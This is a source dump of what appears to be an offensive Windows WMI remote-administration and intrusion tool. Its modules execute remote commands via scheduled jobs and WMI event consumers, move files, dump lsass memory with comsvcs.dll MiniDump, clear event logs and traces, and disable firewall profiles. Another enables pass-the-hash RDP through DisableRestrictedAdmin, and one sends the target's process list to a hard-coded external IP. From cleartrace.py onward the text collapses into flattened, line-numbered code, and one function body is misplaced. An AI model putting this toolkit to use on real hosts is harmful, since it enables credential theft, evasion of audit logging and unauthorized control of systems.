                # This code treats Enabled values 1 and 2 as ON, anything else as OFF.
                if int(EnableID)==1 or int(EnableID)==2:
                    status="ON"
                else:
                    status="OFF"
                print("InstanceID:{} Name:{} EnableID:{}".format(InstanceID,Name,status))
            except Exception as error:
                # NOTE(review): no fallback for other errors — a persistent non-S_FALSE
                # error from Next() would keep this loop spinning.
                if "WBEM_S_FALSE" in str(error):
                    break
    elif "stop"==arg or "start"==arg:
        print("[*] {} Firewall".format(arg))
        if arg=="start":
            status=2
        elif arg=="stop":
            status=0
        user=input("Firewall Name:")
        # Name is interpolated into WQL unescaped.
        WQL+=" where Name=\"{}\"".format(user)
        iEnumWbemClassObject = iWbemServices.ExecQuery(WQL)
        # Unlike the rule code, this path copies Caption from the live object before
        # writing back; a profile Name that matches nothing raises here unguarded.
        firewall_ProfileClass = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
        record = firewall_ProfileClass.getProperties()
        record = dict(record)
        firewall_ProfileInstance = firewall_ProfileClass.SpawnInstance()
        firewall_ProfileInstance.DisabledInterfaceAliases = ""
        firewall_ProfileInstance.Caption = "" if record['Caption']['value'] == None else record['Caption']['value']
        firewall_ProfileInstance.Enabled = status
        # NOTE(review): Description is filled from record['Caption'], not
        # record['Description'] — looks like a copy of the Caption line above.
        firewall_ProfileInstance.Description = "" if record['Caption']['value'] == None else record['Caption']['value']
        iWbemServices.PutInstance(firewall_ProfileInstance.marshalMe())
    dcom.disconnect()
# --------------------------------------------------------------------------------
# /module/__init__.py:
# --------------------------------------------------------------------------------
# Re-exports the impacket names the sibling modules pick up via ``from module import *``
# (e.g. NULL, used as the NTLMLogin placeholder arguments above).
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcom.wmi import IWbemServices
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
from impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
# --------------------------------------------------------------------------------
# /module/check.py:
# --------------------------------------------------------------------------------
import requests
import urllib.parse
import sys  # unused in this module
import os  # unused in this module
import re
from bs4 import BeautifulSoup


def process_check(processlist: str) -> None:
    """Send a process listing to an external lookup service and print the rows it returns.

    Args:
        processlist: raw process listing text. The PID printed for each match is the
            second space-separated token of the first line that starts with the
            matched name — presumably tasklist-style "name  pid ..." lines; verify
            against the caller.

    Returns:
        None; the accumulated "<name> <category> PID:<pid>" lines are printed.
    """
    tmp=[]
    result=""
    # NOTE(defense): the complete process list of the remote host is POSTed in clear
    # text (plain http://) to a hard-coded third-party host the operator does not
    # control — treat this as data leaving the environment. verify=False is a no-op
    # for http:// but would disable certificate validation if the URL became https.
    url="http://42.193.251.15/tasklist.php"
    headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36","Content-Type":"application/x-www-form-urlencoded"}
    rqt=requests.post(url=url,headers=headers,data="avlist={}".format(urllib.parse.quote(processlist)),verify=False)
    html=BeautifulSoup(rqt.text,"html.parser")
    tdlist=html.find_all("td")
    # The response is consumed as pairs of <td> cells: (process name, label).
    for td in tdlist:
        tmp.append(td.get_text())
        if len(tmp)==2:
            # NOTE(review): tmp[0] is used as a regex pattern without re.escape(), and
            # find_pid[0] / split(" ")[1] raise IndexError when the name is absent
            # from ``processlist`` or its line has no second token.
            find_pid=re.findall("{}.*".format(tmp[0]),processlist)
            pid=find_pid[0].split(" ")[1]
            result += "{} {} PID:{}\r\n".format(tmp[0], tmp[1],pid)
            tmp=[]
    print(result)
# --------------------------------------------------------------------------------
# /module/checkError.py:
# --------------------------------------------------------------------------------
from module import *
import logging


def checkError(banner: str, resp) -> None:
    """Log the WBEM call status carried by a WMI response.

    Args:
        banner: label prefixed to the log line.
        resp: a WMI response object exposing ``GetCallStatus(0)``.

    Logs ``<banner> - OK`` at INFO when the status is 0; otherwise logs the
    WBEMSTATUS enum name (``'Unknown'`` if the value is not in the enum) and the
    hex code at ERROR.
    """
    call_status = resp.GetCallStatus(0) & 0xffffffff # interpret as unsigned
    if call_status != 0:
        from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS
        try:
            error_name = WBEMSTATUS.enumItems(call_status).name
        except ValueError:
            error_name = 'Unknown'
        logging.error('%s - ERROR: %s (0x%08x)' % (banner, error_name, call_status))
    else:
        logging.info('%s - OK' % banner)
# --------------------------------------------------------------------------------
# /module/clearEventLog.py:
# --------------------------------------------------------------------------------
from module import *
from module import wmiconnect
from module import vbsrun
from module import checkError  # unused in this module
import time
import os
import uuid
from io import StringIO  # unused in this module


def clear(ip: str = '', username: str = '', password: str = '', domain: str = '', hashes: str = '', aesKey: str = '', logname: str = '', id: str | None = '') -> int | None:
    """Render vbs/clearEventLog.vbs for one event log and run it on the remote host via vbsrun.

    Args:
        ip, username, password, domain, hashes, aesKey: forwarded unchanged to
            ``vbsrun.run_vbs`` / ``vbsrun.delete``.
        logname: one of application/system/setup/forwardedevents/security
            (case-insensitive), or ``"all"`` to fan out over all five.
        id: ``None`` selects the one-shot branch (run, sleep 10 s, then
            ``vbsrun.delete(..., "Example")``); any other value — including the
            default ``''`` — starts a run tagged with a fresh uuid1 instead.
            (Shadows the ``id`` builtin.)

    Returns:
        0 after the ``"all"`` fan-out, 1 for an unknown log name, None otherwise.
    """
    # NOTE(defense): clearing a Windows event log is itself audited — clearing the
    # Security log produces Event ID 1102 ("The audit log was cleared") — so a log
    # consumer should alert on that event rather than rely on the cleared contents.
    lognamelist=["application","system","setup","forwardedevents","security"]
    if logname.lower()=="all":
        for log_ in lognamelist:
            # NOTE(review): ``id`` is not forwarded here, so each per-log call gets the
            # default '' (not None) and takes the else branch below.
            clear(ip, username, password, domain, hashes, aesKey,log_)
        return 0
    if logname.lower() in lognamelist:
        logname=logname
    else:
        print("[-] Not Found LogName:{}".format(logname))
        return 1
    print("[*] clear eventlog:{}".format(logname))
    print("Sleep 10s.....")
    # The template placeholder is replaced with the log name and written to output/;
    # the vbs content itself is not visible here. NOTE(review): neither file handle
    # is closed, and the output file is opened without an explicit encoding.
    temp=open(os.path.join(os.getcwd(), "vbs", "clearEventLog.vbs"),"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAA",logname)
    open(os.path.join(os.getcwd(), "output", "clearEventLog.vbs"),"w").write(temp)
    vbspath = os.path.join(os.getcwd(), "output", "clearEventLog.vbs")
    if id==None:
        vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbspath)
        time.sleep(10)
        vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example")
    else:
        uid = str(uuid.uuid1())
        print("[*] the run vbs to uuid:{}".format(uid))
        print("To stop use --stop_vbs_id ")
        vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbspath,vbsid=uid)
        time.sleep(3)
# --------------------------------------------------------------------------------
# /module/cleartrace.py:
# --------------------------------------------------------------------------------
from module import *
from module import wmiconnect
from module import vbsrun
from module import clearEventLog
import os
import time


# NOTE: the body of cleartrace() continues past the end of this chunk and is not visible here.
def cleartrace(ip: str = '', username: str = '', password: str = '', domain: str = '', hashes: str = '', aesKey: str = ''):
    """Entry point for the ``--cleartrace`` option (body not visible in this chunk).

    Per the README it is meant to remove leftovers under
    ``ROOT\\subscription:ActiveScriptEventConsumer`` and ``C:\\Windows\\Temp`` and
    to loop over clearing the Security log — TODO confirm against the full file.
    """
vbspath=os.path.join(os.getcwd(),"vbs","cleartrace.vbs") 10 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey,vbspath) 11 | print("[*] sleep 3 On cycle clearEventLog Security") 12 | time.sleep(3) 13 | clearEventLog.clear(ip, username, password, domain, hashes, aesKey,"Security",id=True) -------------------------------------------------------------------------------- /module/cmdrun.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | from module import checkError 5 | import chardet 6 | import time 7 | import sys 8 | import datetime 9 | import base64 10 | import uuid 11 | import os 12 | from io import StringIO 13 | 14 | ''' 15 | 这个命令执行写了很久,遇见了好几个bug...最好决定通过利用vbs创建类然后把命令执行结果base64编码然后写进去 16 | 在取回来解码,因为Win32_ScheduledJob一些命令可能需要1分钟来执行,所以通过一直判断是否存在创建的类来判断 17 | 命令执行是否已经完成,这里问过xiaoli师傅,他说功能最好全部用vbs来实现。。但是考虑到vbs可能会重复执行决定分开来写 18 | (有一部分原因是因为懒的改) 19 | 20 | vbs base64编码用的纯算法实现(抄来的) 21 | 22 | 剩下的两个bug: 23 | 1.命令参数传入dir C:\\Users\\会变成-> C:\\\\Users\\ 24 | 2.执行wmic os这类命令不能正确解码,不知道是不是vbs的问题 25 | ''' 26 | 27 | def exec_command(ip, username, password, domain, hashes, aesKey,cmd): 28 | dcom, iWbemLevel1Login =wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 29 | iWbemLevel1Login.RemRelease() 30 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 31 | 32 | sql1 = "SELECT * FROM Win32_LocalTime" 33 | sql2 = "SELECT * FROM Win32_TimeZone" 34 | sql1_query=iWbemServices.ExecQuery(sql1) 35 | pEnum = sql1_query.Next(0xffffffff, 1)[0] 36 | Hour=int(pEnum.Hour) 37 | Minute=int(pEnum.Minute) 38 | Second=int(pEnum.Second) 39 | Machine_Date = datetime.datetime(100,1,1,Hour,Minute,Second) 40 | execute_time = Machine_Date + datetime.timedelta(0, 60) #加一分钟 41 | exectime=execute_time.time() 42 | sql2_query=iWbemServices.ExecQuery(sql2) 43 | pEnum = sql2_query.Next(0xffffffff, 1)[0] 44 | bias=str(pEnum.Bias) 45 | 
executeTime = "********" + str(exectime).replace(":", '') + ".000000+" + str(bias) 46 | print("[*] operation hours:{}".format(executeTime)) 47 | 48 | #print(sql1_query) 49 | uid=str(uuid.uuid1()) 50 | outfile="C:\\Windows\\Temp\\{}.txt".format(uid) 51 | command="C:\Windows\System32\cmd.exe /c \"{}\" > {}".format(cmd,outfile) 52 | print("[*] run command:") 53 | print(outfile) 54 | print(command) 55 | print("CIM_DataFile.Name=\"{}\"".format(outfile.replace("\\","\\\\"))) 56 | Win32_ScheduledJob,resp=iWbemServices.GetObject("Win32_ScheduledJob") 57 | create=Win32_ScheduledJob.Create(command,executeTime,False,0,0,True) 58 | if int(create.ReturnValue)==0: 59 | print("[*] Runn command create sucess") 60 | ''' 61 | tmp=None 62 | while True: 63 | try: 64 | CIM_DataFile,_=iWbemServices.GetObject("CIM_DataFile.Name=\"{}\"".format(outfile.replace("\\","\\\\"))) 65 | if CIM_DataFile.FileSize!=tmp and tmp!=None: 66 | break 67 | else: 68 | print(CIM_DataFile.FileSize,end="",flush=True) 69 | # if tmp!=file_Status: 70 | # print(file_Status) 71 | tmp = CIM_DataFile.FileSize 72 | # print(CIM_DataFile.FileSize) 73 | #break 74 | except Exception as error: 75 | if "WBEM_E_INVALID_QUERY" in str(error): 76 | pass 77 | elif "WBEM_E_NOT_FOUND" in str(error): 78 | pass 79 | else: 80 | print(error) 81 | ''' 82 | 83 | else: 84 | print("[-] Exec Command Failure") 85 | 86 | #time.sleep(1) 87 | #避免缓存 88 | read_executecommand_output_vbs_path=os.path.join(os.getcwd(),"output","exec_command_read.vbs") 89 | tmpvbsdata=open(os.path.join(os.getcwd(), "vbs", "exec_command_read.vbs"),"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",outfile).replace("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",uid) 90 | open(read_executecommand_output_vbs_path,"w",encoding="utf-8") 91 | print(tmpvbsdata,file=open(read_executecommand_output_vbs_path,"a",encoding="utf-8")) 92 | vbspath=read_executecommand_output_vbs_path 93 | # current = sys.stdout 94 | # sys.stdout = StringIO() 95 | vbsrun.run_vbs(ip, 
username, password, domain, hashes, aesKey, vbspath) 96 | # sys.stdout = current 97 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 98 | iWbemLevel1Login.RemRelease() 99 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 100 | while True: 101 | try: 102 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 103 | break 104 | except Exception as error: 105 | if "WBEM_E_NOT_FOUND" in str(error): 106 | pass 107 | else: 108 | print(error) 109 | cmdoutput=readscript.ScriptText 110 | if len(cmdoutput)>0: 111 | try: 112 | decodetext=base64.b64decode(cmdoutput).decode("utf-8") 113 | except: 114 | print("[-] utf-8 decode Failure") 115 | decodetext=base64.b64decode(cmdoutput).replace(b"\x00",b"") 116 | else: 117 | decodetext="" 118 | # dcom.disconnect() 119 | print("------------------------------------------------Result------------------------------------------------") 120 | print(decodetext) 121 | checkError.checkError('Removing ActiveScriptEventConsumer %s' % uid, 122 | iWbemServices2.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % uid)) 123 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 124 | tmp2=open(os.path.join(os.getcwd(), "vbs", "dele_file.vbs"),"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",outfile) 125 | #delete command output file 126 | dele_output_vbs_path = os.path.join(os.getcwd(), "output", "dele_file.vbs") 127 | open(dele_output_vbs_path,"w",encoding="utf-8") 128 | print(tmp2,file=open(dele_output_vbs_path,"a",encoding="utf-8")) 129 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, dele_output_vbs_path) 130 | time.sleep(2.5) 131 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 132 | return decodetext -------------------------------------------------------------------------------- /module/cmdrun2.py: 
-------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import checkError 4 | from module import vbsrun 5 | import os 6 | import uuid 7 | import time 8 | import re 9 | import base64 10 | 11 | def execcmd(ip, username, password, domain, hashes, aesKey,cmd,types="",current_path=""): 12 | print("[*] vbs schtasks run command") 13 | uid=str(uuid.uuid1()) 14 | uid2=str(uuid.uuid1()) 15 | print("[*] ouput command to file:C:\\Windows\\Temp\\{}.txt".format(uid)) 16 | format_vbs=os.path.join(os.getcwd(),"vbs","exec2_command.vbs") 17 | if types=="fake_shell": 18 | tmpdata = open(format_vbs, "r",encoding="utf-8").read() 19 | cmd_format = r'''Action.arguments = chr(34) & "/c cd /d PATH_REPLACE&AAAAAAAAAAAA >> C:\Windows\Temp\BBBBBBBBBBB 2>C:\Windows\Temp\DDDDDDDDDDer_.txt&echo [S] >> C:\Windows\Temp\BBBBBBBBBBB&cd >> C:\Windows\Temp\BBBBBBBBBBB&echo [E] >> C:\Windows\Temp\BBBBBBBBBBB" & chr(34) ''' 20 | th = re.search("Action.arguments = .*", tmpdata) 21 | tmp = tmpdata.replace(th.group(), cmd_format.replace("PATH_REPLACE","\" & Base64Decode(\"{}\") & \"".format(base64.b64encode(current_path.encode()).decode())).replace("AAAAAAAAAAAA","\" & Base64Decode(\"{}\") & \"".format(base64.b64encode(cmd.encode()).decode())).replace("BBBBBBBBBBB",uid+".txt").replace("CCCCCCCCCCCCC",uid).replace("DDDDDDDDDD",uid)).replace("BBBBBBBBBBB",uid+".txt").replace("CCCCCCCCCCCCC",uid).replace("DDDDDDDDDD",uid) 22 | else: 23 | tmp=open(format_vbs,"r",encoding="utf-8").read().replace("AAAAAAAAAAAA",cmd).replace("BBBBBBBBBBB",uid+".txt").replace("CCCCCCCCCCCCC",uid).replace("DDDDDDDDDD",uid) 24 | exec_vbs_path = os.path.join(os.getcwd(), "output", "exec2_command.vbs") 25 | outputvbs=open(exec_vbs_path,"w",encoding="utf-8") 26 | outputvbs.write(tmp) 27 | outputvbs.close() 28 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey,exec_vbs_path,uid2) 29 | dcom, iWbemLevel1Login = 
wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 30 | # iWbemLevel1Login.RemRelease() 31 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 32 | 33 | while True: 34 | try: 35 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 36 | break 37 | except Exception as error: 38 | if "WBEM_E_NOT_FOUND" in str(error): 39 | pass 40 | else: 41 | print(error) 42 | cmdoutput = readscript.ScriptText 43 | 44 | if len(cmdoutput) > 0: 45 | try: 46 | decodetext = base64.b64decode(cmdoutput).decode("utf-8") 47 | except: 48 | print("[-] utf-8 decode Failure") 49 | decodetext = base64.b64decode(cmdoutput).replace(b"\x00", b"") 50 | else: 51 | decodetext = "" 52 | # dcom.disconnect() 53 | print("------------------------------------------------Result------------------------------------------------") 54 | print(decodetext) 55 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,uid2) 56 | dele_output_vbs_path = os.path.join(os.getcwd(), "output", "dele_file.vbs") 57 | tmp2 = open(os.path.join(os.getcwd(), "vbs", "dele_file.vbs"), "r", encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "C:\\Windows\\Temp\\{}".format(uid+".txt")).replace("DDDDDDDDDD",uid) 58 | open(dele_output_vbs_path, "w", encoding="utf-8") 59 | print(tmp2, file=open(dele_output_vbs_path, "a", encoding="utf-8")) 60 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, dele_output_vbs_path) 61 | #延时等待命令执行结果输出的文件全部删除 62 | #time.sleep(2.5) 63 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 64 | return decodetext -------------------------------------------------------------------------------- /module/dumpLsass.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import cmdrun 4 | 5 | def dump_lsass(ip='', username='', 
password='',domain='',hashes='',aesKey=''): 6 | print("[*] Query Lsass PID") 7 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 8 | iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) 9 | iWbemLevel1Login.RemRelease() 10 | win32Process, _ = iWbemServices.GetObject("Win32_Process") 11 | iEnumWbemClassObject = iWbemServices.ExecQuery("select * from Win32_Process where Name=\"lsass.exe\"") 12 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 13 | lsass_pid=iWbemClassObject.Handle 14 | print("[*] the lsass PID:{}".format(lsass_pid)) 15 | cmd=r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump {} lsass.dmp full&&dir C:\windows\System32\lsass.dmp".format(lsass_pid) 16 | cmdrun.exec_command(ip, username, password, domain, hashes,aesKey,cmd) 17 | 18 | -------------------------------------------------------------------------------- /module/enable_pth_login_rdp.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | 4 | def enable_pth_login_rdp(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 5 | if int(isenable)!=1 and int(isenable)!=0: 6 | print("[-] Pluse Query Help,Thanks....") 7 | exit() 8 | print("[*] Enable/disable pth login rdp") 9 | dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 10 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 11 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 12 | 13 | if int(isenable)==1: 14 | pth_open=StdRegProv.SetDWORDValue(2147483650,"System\\CurrentControlSet\\Control\\Lsa","DisableRestrictedAdmin",0) 15 | if pth_open.ReturnValue==0: 16 | print("[+] Enable PTH Rdp Login Sucess") 17 | else: 18 | pth_open = StdRegProv.DeleteValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa","DisableRestrictedAdmin") 19 | if pth_open.ReturnValue == 0: 20 | print("[+] 
Disable PTH Rdp Login Sucess") 21 | dcom.disconnect() -------------------------------------------------------------------------------- /module/files.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | from io import StringIO 5 | import uuid 6 | import os 7 | import sys 8 | import base64 9 | import binascii 10 | import time 11 | 12 | def readfile(ip='', username='', password='',domain='',hashes='',aesKey='',targetfile='',savetofile=''): 13 | teamplevbs_path=os.path.join(os.getcwd(),"vbs","readfile.vbs") 14 | outputvbs_path=os.path.join(os.getcwd(),"output","readfile.vbs") 15 | uid=str(uuid.uuid1()) 16 | vbsid=str(uuid.uuid1()) 17 | remote_filepath_notfound_id="UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 18 | print("[*] ip:{}@{} -> {}".format(ip,targetfile,savetofile)) 19 | tmp=open(teamplevbs_path,"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAA",base64.b64encode(targetfile.encode()).decode()).replace("BBBBBBBBBBBBBBBBBBBBBBB",uid) 20 | newfile=open(outputvbs_path,"w",encoding="utf-8") 21 | newfile.write(tmp) 22 | newfile.close() 23 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, outputvbs_path, vbsid) 24 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 25 | iWbemLevel1Login.RemRelease() 26 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 27 | # while死循环判断vbs不用写文件判断,爽 28 | while True: 29 | try: 30 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 31 | break 32 | except Exception as error: 33 | if "WBEM_E_NOT_FOUND" in str(error): 34 | pass 35 | else: 36 | print(error) 37 | fileodata = base64.b64decode(readscript.ScriptText) 38 | if readscript.ScriptText==remote_filepath_notfound_id: 39 | print(fileodata.decode()) 40 | else: 41 | print("[*] filedat 
size:{}".format(len(fileodata))) 42 | wb=open(savetofile,"wb") 43 | wb.write(fileodata) 44 | wb.close() 45 | print("[+] save to file sucess") 46 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,vbsid) 47 | 48 | 49 | def WriteFile(ip, username, password, domain, hashes, aesKey,targetfile,savetofile): 50 | if os.path.exists(targetfile)==False: 51 | print("[-] File:{} Not Found".format(targetfile)) 52 | exit() 53 | print("[*] upload file:{} -> save to filepath:{}".format(targetfile,savetofile)) 54 | filedata=binascii.hexlify(open(targetfile,"rb").read()).decode() 55 | vbsid=str(uuid.uuid1()) 56 | teamplevbs=os.path.join(os.getcwd(),"vbs","writeFile.vbs") 57 | outfilevbs=os.path.join(os.getcwd(),"output","writeFile.vbs") 58 | tmp=open(teamplevbs,"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAA",filedata).replace("BBBBBBBBBBBBBBBBBBBBBBB",base64.b64encode(savetofile.encode()).decode()) 59 | newfile=open(outfilevbs,"w",encoding="utf-8") 60 | newfile.write(tmp) 61 | newfile.close() 62 | #想这种vbs调用组件IO写文件,拥有阻塞性,执行如果没执行完的话会一直阻塞,相当于变向判断了文件是否成功写入(大文件可以,小文件翻车,重复不行,还是延迟,操) 63 | 64 | current = sys.stdout 65 | sys.stdout = StringIO() 66 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey,outfilevbs,vbsid) 67 | sys.stdout=current 68 | time.sleep(2.5) 69 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,vbsid) 70 | print("[*] write file vbs run Finish") 71 | 72 | def deletefile(ip, username, password, domain, hashes, aesKey,targetfile): 73 | teamplevbs_path = os.path.join(os.getcwd(), "vbs", "delete_file.vbs") 74 | outputvbs_path = os.path.join(os.getcwd(), "output", "delete_file.vbs") 75 | vbsid = str(uuid.uuid1()) 76 | temp=open(teamplevbs_path,"r",encoding="utf-8").read() 77 | temp=temp.replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", base64.b64encode(targetfile.encode()).decode()) 78 | newfile = open(outputvbs_path, "w", encoding="utf-8") 79 | newfile.write(temp) 80 | newfile.close() 81 | vbsrun.run_vbs(ip, username, 
password, domain, hashes, aesKey, outputvbs_path, vbsid) 82 | time.sleep(2.5) 83 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, vbsid) 84 | print("[*] Delete file:{} sucess".format(targetfile)) -------------------------------------------------------------------------------- /module/getProcessList.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import printReply 4 | import time 5 | def getProcessList(ip='', username='', password='',domain='',hashes='',aesKey='',query=False): 6 | print("[*] Get Process List") 7 | result_echoformat="" 8 | dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 9 | iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) 10 | iWbemLevel1Login.RemRelease() 11 | win32Process, _ = iWbemServices.GetObject("Win32_Process") 12 | ProcessList = iWbemServices.ExecQuery("SELECT * from Win32_Process") 13 | process_result = printReply.printReply(ProcessList) 14 | split_process_result=process_result.split("\n") 15 | for process in range(1,len(process_result)): 16 | try: 17 | fg_process=split_process_result[process].split("|") 18 | processname=fg_process[1].lstrip().rstrip() 19 | create_process_time=time.strftime("%Y-%m-%d-%H:%M:%S",time.strptime(fg_process[9].split(".")[0].lstrip().rstrip(),"%Y%m%d%H%M%S")) 20 | processpid=fg_process[10].lstrip().rstrip() 21 | commandline=fg_process[-2].lstrip().rstrip() 22 | echoformat="{} {} {} {}".format(processname,processpid,commandline,create_process_time) 23 | result_echoformat+=echoformat+"\r\n" 24 | print(echoformat) 25 | 26 | except Exception as error: 27 | pass 28 | 29 | if query == True: 30 | print("========================================TASKLIST QUERY====================================================") 31 | print() 32 | from module import check 33 | check.process_check(result_echoformat) 34 | dcom.disconnect() 
-------------------------------------------------------------------------------- /module/listdir.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | import uuid 5 | import base64 6 | import os 7 | 8 | def ls(ip='', username='', password='',domain='',hashes='',aesKey='',targetpath=''): 9 | vbs_teample_path=os.path.join(os.getcwd(),"vbs","listdir.vbs") 10 | output_vbs_path=os.path.join(os.getcwd(),"output","listdir.vbs") 11 | uid=str(uuid.uuid1()) 12 | vbsid=str(uuid.uuid1()) 13 | temp=open(vbs_teample_path,"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAA",base64.b64encode(targetpath.encode()).decode()).replace("BBBBBBBBBBBBBBBBBBBBBBB",uid) 14 | newfile = open(output_vbs_path, "w", encoding="utf-8") 15 | newfile.write(temp) 16 | newfile.close() 17 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, output_vbs_path, vbsid) 18 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 19 | iWbemLevel1Login.RemRelease() 20 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 21 | # while死循环判断vbs不用写文件判断,爽 22 | while True: 23 | try: 24 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 25 | break 26 | except Exception as error: 27 | if "WBEM_E_NOT_FOUND" in str(error): 28 | pass 29 | else: 30 | print(error) 31 | fileodata = base64.b64decode(readscript.ScriptText).decode() 32 | print("==============================={}===============================".format(targetpath)) 33 | print(fileodata) 34 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,vbsid) -------------------------------------------------------------------------------- /module/printReply.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | import sys 3 | import logging 4 | from io 
import StringIO 5 | def printReply(iEnum): 6 | current=sys.stdout 7 | sys.stdout = StringIO() 8 | printHeader = True 9 | while True: 10 | try: 11 | pEnum = iEnum.Next(0xffffffff, 1)[0] 12 | record = pEnum.getProperties() 13 | if printHeader is True: 14 | print('|', end=' ') 15 | for col in record: 16 | print('%s |' % col, end=' ') 17 | print() 18 | printHeader = False 19 | print('|', end=' ') 20 | for key in record: 21 | if type(record[key]['value']) is list: 22 | for item in record[key]['value']: 23 | print(item, end=' ') 24 | print(' |', end=' ') 25 | else: 26 | print('%s |' % record[key]['value'], end=' ') 27 | print() 28 | except Exception as e: 29 | if logging.getLogger().level == logging.DEBUG: 30 | import traceback 31 | traceback.print_exc() 32 | sys.exit(1) 33 | if str(e).find('S_FALSE') < 0: 34 | raise 35 | else: 36 | break 37 | 38 | result=sys.stdout.getvalue() 39 | sys.stdout = current 40 | return result 41 | iEnum.RemRelease() 42 | sys.stdout=current -------------------------------------------------------------------------------- /module/rdpsetting.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | 4 | def enablerdp(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 5 | if int(isenable)==2: #偷懒 6 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 7 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 8 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 9 | rdpport = StdRegProv.GetDWORDValue(2147483650, 10 | "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", 11 | "PortNumber") 12 | print("[*] RDP Port:{}".format(rdpport.uValue)) 13 | dcom.disconnect() 14 | exit() 15 | if int(isenable)!=1 and int(isenable)!=0: 16 | print("[-] Pluse Query Help,Thanks....") 17 | exit() 18 | 19 | print("[*] Enable/Disable RDP") 20 | 
